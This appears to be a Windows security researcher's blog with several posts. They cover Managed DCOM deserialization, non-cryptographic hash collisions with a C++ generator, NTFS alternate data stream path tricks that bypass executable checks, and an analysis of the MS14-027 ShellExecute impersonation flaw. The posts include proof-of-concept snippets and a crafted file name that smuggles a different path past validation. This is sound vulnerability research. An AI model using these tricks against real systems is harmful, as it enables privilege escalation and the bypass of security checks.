Sometimes the simplest things amuse me. Take for example CVE-2014-0257, which was a bug in the way DCOM was implemented in .NET and which enabled an Internet Explorer sandbox escape. Via the DCOM interface you could call the System.Object.GetType method and then use the reflection APIs to do anything you liked, such as popping the calculator. The COM interface, _Object, which exposed the GetType method only has 4 functions on it; it seemed pretty unlucky that 25% of the interface had a security vulnerability. Still, Microsoft fixed this bug and all's well with the world. Then again, if you were lucky enough to see any of my IE11 sandbox presentations you might have seen the following slide, although briefly:

Why would I point out the Equals method as well? Well, because it also has a bug, one so difficult to fix that Microsoft has basically thrown up its hands and given up on Managed DCOM. They've mitigated the issue in the ClickOnce deployment service (CVE-2014-4073) by reimplementing the DCOM object in native code, but as far as I'm aware they've not fixed the underlying issue.

To understand the problem we have to go back to CVE-2014-0257 and understand why it worked. When the GetType method returns a System.Type instance over DCOM it wraps the object in a COM Callable Wrapper (CCW). This looks to the COM infrastructure like a normal pass-by-reference object, so the Type instance stays in the original process (say the ClickOnce service) but exposes the remote COM interfaces to the caller. The Type class is marked as Serializable, so why doesn't the CCW implement IMarshal and custom-marshal the object to the caller? Because it would be a pretty rude thing to do; it would force the CLR to be loaded into a process just because it happened to be communicating with a .NET DCOM server.

If you implement similar code in C#, though, things change. The result of calling GetType is a local instance of the Type class. How does .NET know how to do this? This is where the IManagedObject interface gets involved. Every CCW implements the IManagedObject interface, which has two methods: GetObjectIdentity, which is used to determine if the object exists in the same AppDomain, and GetSerializedBuffer which, well, I guess the name describes itself.

When a .NET client receives a COM object it tries to see if it's really a .NET object in disguise. To do this it calls QueryInterface for IManagedObject; if that succeeds it will then call GetObjectIdentity to see if the object is already in the same AppDomain (if so it can just call it directly). Finally it will call GetSerializedBuffer; if the wrapped .NET object is Serializable it will receive a serialized version of the object, which it can recreate using the BinaryFormatter class. Yes, that BinaryFormatter class.
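For reference, the interface looks roughly like this (a sketch from memory; consult mscoree.idl for the authoritative definition):

using System;
using System.Runtime.InteropServices;

[ComImport, Guid("C3FCC19E-A970-11d2-8B5A-00A0C9B7C9C4"),
 InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
interface IManagedObject {
    // Returns a BinaryFormatter-serialized copy of the wrapped object,
    // assuming it's serializable.
    void GetSerializedBuffer([MarshalAs(UnmanagedType.BStr)] out string bstr);

    // Used to work out if the object lives in the caller's AppDomain.
    void GetObjectIdentity([MarshalAs(UnmanagedType.BStr)] out string bstrGuid,
        out int appDomainId, out IntPtr ccw);
}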

Oh crap!

This of course works in reverse: if a COM client passes a .NET object to a DCOM server it can cause arbitrary BinaryFormatter deserialization in the server. The Equals method will accept any object by design. So by passing a malicious serializable .NET object to Equals you can end up doing fun things like reflecting an arbitrary Delegate over the DCOM interface. As you can imagine that's bad.

At this point I'll direct you to the exploit code, which should make everything clearer, or not. There's actually a lot more to the exploit than it seems :-)

Sunday, 14 September 2014

Hash Collisions of the Non-Cryptographic Kind

Recently I had a bug which required me to create a hash collision between two strings. Fortunately it wasn't a cryptographically secure hashing algorithm, it was only used in a hash table. The algorithm itself was pretty simple, as shown below:
int hash(const char* c, size_t len) {
 int h = 0;

 while (len > 0) {
   h = h * 31 + *c++;
   len--;
 }

 return h;
}

I had one string, say "abc" which I needed to have the same hash as "xyz". As this code was written in C all string comparisons were performed using the standard C string functions. Therefore from a comparison point of view the strings "abc", "abc\0efgh" etc. are equivalent as the comparison function would terminate at the NUL. However because the hashing algorithm takes the entire string including any NUL characters their hash values are not equal. This makes it possible to create a string with the following properties:

char* s = "abc\0"+SUFFIX;
strcmp(s, "abc") == 0

and

H(s) != H("abc")
H(s) == H("xyz")

To generate the collision you might be tempted to try brute force, well good luck with that. Being one for pointless pop culture references I recalled the Exorcist, and realized "The Power of Maths Compels You...", isn't that what the film's about?

On second thoughts perhaps it's about something else entirely?
Clearly Maths holds the key to calculating the hash collision. I had free rein on the characters I could choose to generate the collision, which makes things simpler. The key is realising what the hashing algorithm actually does. If you expand out the original code you get something like the following, where S is the string and N is the length of the string.

h = S[0]*31^(N-1) + S[1]*31^(N-2) + ... + S[N-1]*31^0

Does that look familiar? No? Well, what if I changed the value 31 to 2, giving:

h = (S[0] << (N-1)) + (S[1] << (N-2)) + ... + (S[N-1] << 0)

Look more familiar? It turns out all the hashing algorithm is doing is generating a base-31 number. Therefore finding a hash collision mathematically is going to be pretty simple. All we need to do is calculate the hash of the string with a dummy suffix, calculate the difference between that hash and the destination hash, and finally encode that difference into the suffix as a base-31 number. So for completeness here's my code in C++.

#include <stdio.h>
#include <string.h>
#include <string>
#include <iostream>
using namespace std;

int H(int h, const string& s) {
  for (char c : s) {
    h = h * 31 + c;
  }
  return h;
}

string collide(const string& target_str, const string& base_str) {
  // Initialize suffix with 8 zero characters. The leading NUL at
  // suffix[0] terminates the C string comparison; the remaining
  // slots hold the base-31 digits.
  string suffix(8, 0);

  int target_hash = H(0, target_str);
  int base_hash = H(H(0, base_str), suffix);

  unsigned int diff = target_hash - base_hash;

  // Write the difference into the suffix as a base-31 number,
  // least significant digit last.
  for(int i = 7; i > 1; --i) {
    suffix[i] = diff % 31;
    diff /= 31;
  }

  suffix[1] = diff;

  return base_str + suffix;
}

int main() {
  string a = "xyz";
  string b = "abc";
  string c = collide(a, b);

  // Hashes: H(c) matches H(a), while strcmp still considers b and c equal.
  cout << H(0, a) << " " << H(0, b) << " " << H(0, c) << endl;
  cout << b.compare(c) << " " << strcmp(b.c_str(), c.c_str()) << endl;

  return 0;
}

Sometimes it pays just to sit down and think through seemingly tricky problems as they tend to be simpler than you imagine.

Thursday, 5 June 2014

Addictive Double-Quoting Sickness

Much as I'd love it if people who used "Scare Quotes" (see what I did there) were punished appropriately I doubt my intolerance is shared sufficiently amongst the general population. So this blog's not about that, but something security related which keeps on popping up, when it really shouldn't.

Still if I could be as loved as Mike Myers it might be worth using them myself. Wait...
This is a post about abusing ADS, but what I'm going to talk about is something I refer to as Domain-Specific Weirdness, at least when I'm bored and decide to make stuff up. The term refers to those bugs which are due to not understanding the differences between domain-specific representations. A far too common coding pattern you'll see on Windows in "Secure" systems (I really need help) is something like the following:
path = GetExecutablePath();

if(ValidAuthenticode(path)) {
    cmdline = '"' + path + '"';

    CreateProcess(NULL, cmdline, ...); 
}

The security issue appears when the executable path is influenced by untrusted code. The ValidAuthenticode function verifies the file is signed by a specific certificate. Only if that passes will the executable be started. This hits so many bug classes as it is: poor input validation, TOCTOU between the validation and process creation, and failing to pass the first argument to CreateProcess. But the sad thing is you see it in real software by real companies, even Microsoft.

Now to be fair, the one thing the code does right is it ensures the path is double-quoted before passing it to CreateProcess. At least you won't get some hack hassling you for executing C:\Program.exe again. But process command lines and file paths are two completely different interpretation domains. CreateProcess pretty much follows how the standard C Runtime parses the process path. The CRT source is available, so we can take a look at how the executable name is parsed out. In there you'll find the following comment (the file's stdargv.c if you're curious):
/* A quoted program name is handled here. The handling is much
   simpler than for other arguments. Basically, whatever lies
   between the leading double-quote and next one, or a terminal null
   character is simply accepted. Fancier handling is not required
   because the program name must be a legal NTFS/HPFS file name.
   Note that the double-quote characters are not copied, nor do they
   contribute to numchars. */
You've got to love how much MS still cares about OS/2. Except this is of course rubbish; the program name doesn't have to be a legal NTFS/HPFS file name in any way, especially for CreateProcess. The rationale for ignoring illegal program names is that NTFS, like many file systems, has a specific set of valid characters.
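In code, the quoted-program-name rule from that comment boils down to something like the following sketch (not the actual CRT source):

// Everything between the leading double-quote and the next one (or the
// end of the string) is accepted verbatim as the program name.
static string GetProgramName(string cmdline) {
    if (cmdline.StartsWith("\"")) {
        int end = cmdline.IndexOf('"', 1);
        return end < 0 ? cmdline.Substring(1)
                       : cmdline.Substring(1, end - 1);
    }
    int space = cmdline.IndexOf(' ');
    return space < 0 ? cmdline : cmdline.Substring(0, space);
}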

What's a valid NTFS file name you might ask? You can go look it up in MSDN; instead I put together a quick test case to find out.
#include <stdio.h>
#include <Windows.h>
#include <string>
 
int wmain(int argc, WCHAR* argv[])
{ 
    for (int i = 1; i < 65536; ++i)
    {
        // Build a name of the form .\aXa where X is the character
        // under test.
        std::wstring name = L".\\a";
        name += (WCHAR)i;
        name += L"a";
 
        HANDLE hFile = CreateFileW(name.c_str(), 
          GENERIC_READ | GENERIC_WRITE, FILE_SHARE_DELETE, NULL, 
          CREATE_ALWAYS, FILE_FLAG_DELETE_ON_CLOSE, NULL);

        if (hFile == INVALID_HANDLE_VALUE)
        {
            printf("Illegal Char: %d\n", i);
        }
        else
        {
            CloseHandle(hFile);
        }
    }
 
    return 0;
}
And it pretty much confirms MSDN: you can't use characters 1 through 31 (0 is implied), 32 (space) has some oddities, and you can't use any of <, >, :, ", /, \, |, ? or *. Notice the double-quote sitting there proud, in the middle.

Okay, let's get back to the point, what's this got to do with ADS? If you read this you'll find the following statement: "Any characters that are legal for a file name are also legal for the stream name, including spaces". If you read that and thought it meant that stream names have the same restrictions as file names in NTFS, I have a surprise for you. Change the test case so that instead of '.\a' we use '.\a:' and we find that the only banned characters are \, / and :, quite a surprise. For our "bad" code we can now complete the circle of exploitation. You can pass a file name such as c:\abc\xyz:file" and the verification code will verify the stream c:\abc\xyz:file" but, because the command line parsing stops at the embedded double-quote, the process actually executed is c:\abc\xyz:file (subtle I know). And the crazy thing about this is there isn't even a way to escape it.

The moral of the story is this: you can never blindly assume that even a single interpretation domain works how you expect it to, so when you mix domains together pain will likely ensue. This is also why Windows command line processing is so broken. At least *nix passes command line arguments separately, well, unless you use something like system(3) (and for that you'll be punished). Making assumptions on the "validity" of a file path just seems inherently untrustworthy.

Tuesday, 27 May 2014

Abusive Directory Syndrome

As ever there's been some activity recently on Full Disclosure where one side believes something's a security vulnerability and the other says it's not. I'm not going to be drawn into that debate, but one interesting point did come up: specifically, that you can't create files in the root of the system drive (i.e. C:\) as a non-admin user, you can only create directories. Well, this is both 100% true and false at the same time; it just depends what you mean by a "file" and who is asking at the time.

The title might give the game away: this is all to do with NTFS Alternate Data Streams (ADS). The NTFS file system supports multiple alternate data streams which can be assigned to a file; these can be used for storing additional attributes and data out-of-band. For example ADS is used by Internet Explorer to store the zone information for a downloaded file so the shell can warn you when you try to execute a file from the Internet. Streams have names and are accessed using a special syntax, filename:streamname. You can easily create a data stream using the command prompt; type the following (in a directory you can write to):

echo Hello > abc
echo World! > abc:stm

more < abc  - Prints Hello
more < abc:stm - Prints World!

Easy no? Okay lets try it in the root of the system drive (obviously as a normal user):

echo Hello > c:\abc:stm - Prints Foxtrot Oscar
Oh well, worth a try, but wait, there's more... One of the lesser known abilities of ADS, except to the odd malware author, is that you can also create streams on directories. Does this create new directories? Of course not, it creates file streams which you can access using the file APIs. Let's try this again:

mkdir c:\abc
echo Fucking Awesome! > c:\abc:stm
more < c:\abc - File can't be found
more < c:\abc:stm - Prints Fucking Awesome!

Well we've created something which looks like a file to the Windows APIs, but is in the root of the system drive, something you're not supposed to be able to do. It seems deeply odd that you can:

  • Add an ADS to a directory, and
  • Have the ADS treated as a file from the API perspective

Of course this doesn't help us exploit unquoted service paths, you can't have everything. Still, when you consider the filename from a security perspective it has an interesting property, namely that its nominal parent in the hierarchy (when we're dealing with paths that's going to be what's separated by slashes) is C:\. A naive security verification process might therefore assume that the file exists in a secure directory, leading to a security issue.
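For example, a hypothetical naive check might take everything before the last backslash as the parent directory:

// For c:\windows\system32\tasks:stm the "parent" comes back as
// c:\windows\system32, which looks secure, even though the stream
// itself can be created by anyone with write access to the directory.
static bool IsInSecureDirectory(string path, string secureDir) {
    int idx = path.LastIndexOf('\\');
    string parent = idx < 0 ? "" : path.Substring(0, idx);
    return string.Equals(parent, secureDir,
        StringComparison.OrdinalIgnoreCase);
}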

Take for example User Account Control (UAC), better known as the "Stop with the bloody security dialogs and let me get my work done" feature which was introduced in Vista. The service which controls this (Application Info) has the ability to automatically elevate certain executables, either for controlling the UI (UIAccess) or to reduce the number of prompts you see. It verifies that the executables are in a secure directory such as c:\windows\system32 but specifically excludes writeable directories such as c:\windows\system32\tasks. But if you could write to Tasks:stm then that wouldn't be under the Tasks directory and so would be allowed? Well, let's try it!

echo Hello > c:\windows\system32\tasks:stm
more < c:\windows\system32\tasks:stm - Access Denied :(

Why does it do that? We only have to take a look at the DACL to find out why: we have write access to Tasks but not read:

c:\>icacls c:\Windows\system32\tasks
c:\Windows\system32\tasks BUILTIN\Administrators:(CI)(F)
                          BUILTIN\Administrators:(OI)(R,W,D,WDAC,WO)
                          NT AUTHORITY\SYSTEM:(CI)(F)
                          NT AUTHORITY\SYSTEM:(OI)(R,W,D,WDAC,WO)
                          NT AUTHORITY\Authenticated Users:(CI)(W,Rc)
                          NT AUTHORITY\NETWORK SERVICE:(CI)(W,Rc)
                          NT AUTHORITY\LOCAL SERVICE:(CI)(W,Rc)
                          CREATOR OWNER:(OI)(CI)(IO)(F)

Oh well... Such is life. We've managed to create the stream but can't read it back; awesome, Write-Only Memory. Still, this does demonstrate something interesting: the DACL for the directory is applied to all its streams, even though the DACL might make little sense for file content. The directory DACL for Tasks doesn't allow normal users to read or list the directory, which means that you can't read or execute the file stream.

In conclusion, all you need to be able to create an ADS on a directory is write access to the directory. This is normally so you can modify the contents of the directory, but it also applies to creating streams. The immediate security parent for a stream is then the directory itself, which might not be what a verification process expects. If I find the time I might blog about other interesting abuses of ADS at a later date.

Wednesday, 21 May 2014

Impersonation and MS14-027

The recent MS14-027 patch intrigued me: a local EoP using ShellExecute. It seems it also intrigued others, so I pointed out on Twitter how it probably worked, but I hadn't confirmed it. This post is just a quick write up of what the patch does and doesn't fix. It turned out to be more complex than it first seemed and I'm not even sure it's correctly patched. Anyway, first a few caveats: I am fairly confident that what I'm presenting here is already known to some anyway. Also I'm not providing direct exploitation details; you'd need to find the actual mechanism to get the EoP working (at least to LocalSystem).

I theorized that the issue was due to mishandling of the registry when querying for file associations, specifically the handling of the HKEY_CLASSES_ROOT (HKCR) registry hive when under an impersonation token. When the ShellExecute function is passed a file to execute it first looks up the extension in the HKCR key. For example if you try to open a text file, it will try and open HKCR\.txt. If you know anything about the registry and how COM registration works you might know that HKCR isn't a real registry hive at all. Instead it's a merging of the keys HKEY_CURRENT_USER\Software\Classes and HKEY_LOCAL_MACHINE\Software\Classes. In most scenarios HKCU is taken to override HKLM registration, as we can see in the following screenshot from Process Monitor (note PM records all access to HKLM classes as HKCR, confusing the issue somewhat). 





When ShellExecute has read this registry key it tries to read a few values out of it, most importantly the default value. The data of the default value represents a ProgID which determines how the shell handles the file extension. So for example the .txt extension is mapped to the ProgID 'txtfile'.

The ProgID just points ShellExecute at HKCR\txtfile, where we finally find what we're looking for: the shell verb registrations. The ShellExecute function also takes a verb parameter, this is the action to perform on the file, so it could be print or edit, but by far the most common one is open. There are many possible things to do here but one common action is to run another process passing the file path as an argument. As you can see below a text file defaults to being passed to NOTEPAD.

Now the crucial thing to understand here is that HKCU can be written to by a normal, unprivileged user. But HKCU is again a fake hive and is in fact just the key HKEY_USERS\SID where SID is replaced with the string SID of the current user (see, pretty obvious, I guess). And even this isn't strictly 100% true when it comes to HKCR, but it's close enough. Anyway, so what, you might be asking? Well this is wonderful until user impersonation gets involved. If a system or administrator process impersonates another user it suddenly finds that when it accesses HKCU it really accesses the impersonated user's keys instead of its own. Perhaps this could lead to a system service that is impersonating a user calling ShellExecute and starting up the wrong handler for a file type, leading to arbitrary execution at a higher privilege. 

With all this in mind let's take a look at the patch in a bit more depth. The first step is to diff the patched binary with the original, sometimes easier said than done. I ran unpatched and patched copies of shell32.dll through Patchdiff2 in IDA Pro which led to a few interesting changes. In the function CAssocProgidElement::_InitFileAssociation a call was added to a new function, CAssocProgidElement::SetPerMachineRootIfNeeded.


Digging into that revealed what the function was doing. If the current thread is impersonating another user, the current Session ID is 0 and the file extension being looked up is one of a set of specific types, the lookup is switched from HKCR to HKLM only. This seemed to confirm my suspicions that the patch targeted local system elevation (the only users in session 0 are likely to be LocalSystem or one of the service accounts) and that it was related to impersonation.




Looking at the list of extensions they all seemed to be executables (so .exe, .cmd etc.) so I knocked up a quick example program to test this out.
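The program itself isn't reproduced here, but a minimal reconstruction might look something like this (a hedged sketch: the P/Invoke declarations are simplified and all error checking is omitted):

using System;
using System.Runtime.InteropServices;
using System.Security.Principal;

class ImpersonateShellExec {
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(int access, bool inherit, int pid);

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr process, int access,
        out IntPtr token);

    [DllImport("shell32.dll", CharSet = CharSet.Unicode)]
    static extern IntPtr ShellExecute(IntPtr hwnd, string verb, string file,
        string args, string dir, int showCmd);

    const int PROCESS_QUERY_INFORMATION = 0x0400;
    const int TOKEN_ACCESS = 0x0002 | 0x0004 | 0x0008; // DUPLICATE|IMPERSONATE|QUERY

    static void Main(string[] args) {
        string path = args[0];        // executable file to "open"
        int pid = int.Parse(args[1]); // process whose user we impersonate

        IntPtr process = OpenProcess(PROCESS_QUERY_INFORMATION, false, pid);
        IntPtr token;
        OpenProcessToken(process, TOKEN_ACCESS, out token);

        // Impersonate the target token on this thread, then let
        // ShellExecute do its HKCR lookups under impersonation.
        WindowsImpersonationContext ctx = WindowsIdentity.Impersonate(token);
        try {
            ShellExecute(IntPtr.Zero, "open", path, null, null, 1);
        } finally {
            ctx.Undo();
        }
    }
}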


Running this program from a system account (using good old psexec -s), passing it the path to an executable file and the process ID of one of my user processes (say explorer.exe), I could see in Process Monitor that it's reading the corresponding HKCU registry settings.

Okay, so a last bit of exploitation is necessary I guess :) If you now register your own handler for the executable ProgID (in this case cmdfile), then no matter what the process executes it will instead run code of the attacker's choosing at whatever privilege the caller has. This is because impersonation doesn't automatically cross to new processes; you'd need to call something special like CreateProcessAsUser to do that.


So how's it being exploited in the real world? I can't say for certain without knowing the original attack vector (and I don't really have the time to go wading through all the system services looking for the bad guy, assuming it's even Microsoft's code and not a third party service). Presumably there's something which calls ShellExecute on an executable file type (which you don't control the path to) while impersonating another user.

Still, is it fixed? One thing I'm fairly clear on is that there still seem to be a few potential attack vectors. This doesn't seem to do anything against an elevated admin user's processes being subverted. If you register a file extension as the unprivileged user it will get used by an admin process for the same user. This is ultimately by design, otherwise you would get inconsistent behaviour in elevated processes. The fix is only enabled if the current thread is impersonating and it's in session 0 (i.e. system services), and it's only enabled for certain executable file types.

This last requirement might seem odd; surely this applies to any file type? Well it does in a sense, however the way ShellExecute works is that if the handling of the file type might block, it runs the processing asynchronously in a new thread. Just like processes, threads don't inherit impersonation levels so the issue goes away. It turns out about the only thing it treats synchronously is executables. Well, unless anyone instead uses things like FindExecutable or AssocQueryString, but I digress ;-) And in my investigation I found some other stuff which perhaps I should send MS's way; let's hope I'm not too lazy to do so.